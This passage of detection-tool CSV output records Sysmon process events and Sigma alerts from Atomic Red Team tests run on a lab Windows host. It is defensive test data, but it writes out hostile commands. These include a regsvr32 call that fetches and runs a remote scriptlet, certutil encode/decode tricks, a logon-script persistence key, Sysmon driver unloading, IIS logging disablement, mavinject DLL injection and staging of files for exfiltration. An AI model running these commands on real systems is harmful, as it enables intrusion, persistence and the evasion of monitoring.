powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.026 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.893 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
-2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser 
: Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil 
Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 